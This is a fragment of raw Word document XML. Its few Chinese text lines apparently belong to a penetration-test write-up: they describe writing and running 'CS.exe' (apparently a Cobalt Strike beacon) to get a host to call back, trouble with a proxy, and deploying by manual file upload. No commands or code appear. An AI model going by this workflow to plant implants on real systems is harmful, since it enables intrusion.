      <w:r w:rsidRPr="002C4793">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1705A98A" wp14:editId="7201B497">
            <wp:extent cx="5274310" cy="1090930"/>
            <wp:effectExtent l="0" t="0" r="254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A9B9" w14:textId="7643430F" w:rsidR="002C4793" w:rsidRDefault="002C4793" w:rsidP="00FF6FD0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写入C</w:t>
      </w:r>
      <w:r>
        <w:t>S.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行上线</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7094B5" w14:textId="37B25AFF" w:rsidR="002C4793" w:rsidRDefault="002C4793" w:rsidP="00FF6FD0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不知道为什么，配置好代理后浏览器能访问，工具一直走不通</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5059A866" w14:textId="720CD7DE" w:rsidR="002C4793" w:rsidRDefault="002C4793" w:rsidP="00FF6FD0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所以我后续直接</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>手动上</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传文件部署的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C254FC" w14:textId="474332C5" w:rsidR="002C4793" w:rsidRDefault="002C4793" w:rsidP="00FF6FD0"/>
    <w:p w14:paraId="77FF86B4" w14:textId="77777777" w:rsidR="002C4793" w:rsidRPr="00FF6FD0" w:rsidRDefault="002C4793" w:rsidP="00FF6FD0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="002C4793" w:rsidRPr="00FF6F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6A40A" w14:textId="77777777" w:rsidR="006D2997" w:rsidRDefault="006D2997" w:rsidP="00CC0108">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="627941B1" w14:textId="77777777" w:rsidR="006D2997" w:rsidRDefault="006D2997" w:rsidP="00CC0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B5176" w14:textId="77777777" w:rsidR="006D2997" w:rsidRDefault="006D2997" w:rsidP="00CC0108">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5E3ED151" w14:textId="77777777" w:rsidR="006D2997" w:rsidRDefault="006D2997" w:rsidP="00CC01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B0E"/>
    <w:rsid w:val="000D0ACB"/>
    <w:rsid w:val="001078C2"/>
    <w:rsid w:val="00110A12"/>
    <w:rsid w:val="00123D3F"/>
    <w:rsid w:val="002C36B3"/>
    <w:rsid w:val="002C4793"/>
    <w:rsid w:val="00322509"/>
    <w:rsid w:val="00346A7A"/>
    <w:rsid w:val="003B589E"/>
    <w:rsid w:val="003D06B6"/>
    <w:rsid w:val="004B79D7"/>
    <w:rsid w:val="00531160"/>
    <w:rsid w:val="0063641B"/>
    <w:rsid w:val="006D2997"/>
    <w:rsid w:val="006E1976"/>
    <w:rsid w:val="00745870"/>
    <w:rsid w:val="008C3623"/>
    <w:rsid w:val="008E16C1"/>
    <w:rsid w:val="00986F0D"/>
    <w:rsid w:val="00A04B0E"/>
    <w:rsid w:val="00A93BAF"/>
    <w:rsid w:val="00AB540A"/>
    <w:rsid w:val="00B14AB2"/>
    <w:rsid w:val="00B55755"/>
    <w:rsid w:val="00B85BBB"/>
    <w:rsid w:val="00C71BA8"/>
    <w:rsid w:val="00CC0108"/>
    <w:rsid w:val="00D81EDE"/>
    <w:rsid w:val="00DB0444"/>
    <w:rsid w:val="00E047F4"/>
    <w:rsid w:val="00E07AAB"/>
    <w:rsid w:val="00F54B89"/>
    <w:rsid w:val="00F57AB1"/>
    <w:rsid w:val="00F70A84"/>
    <w:rsid w:val="00F71EE6"/>
    <w:rsid w:val="00FD4D68"/>
    <w:rsid w:val="00FF6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4915C9"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{075EA1E6-EA00-4809-8532-E3CE70396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FF6FD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FF6FD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FF6FD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FF6FD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CC01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C010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C01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C0108"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a9">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F57AB1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F57AB1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semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DB044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B0444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68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s://www.cnblogs.com/geek233/p/16772618.html" TargetMode="External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5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1203</TotalTime>
  <Pages>10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1711471241@qq.com</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>1711471241@qq.com</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-13T00:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-15T09:36:00Z</dcterms:modified>
</cp:coreProperties>
</file>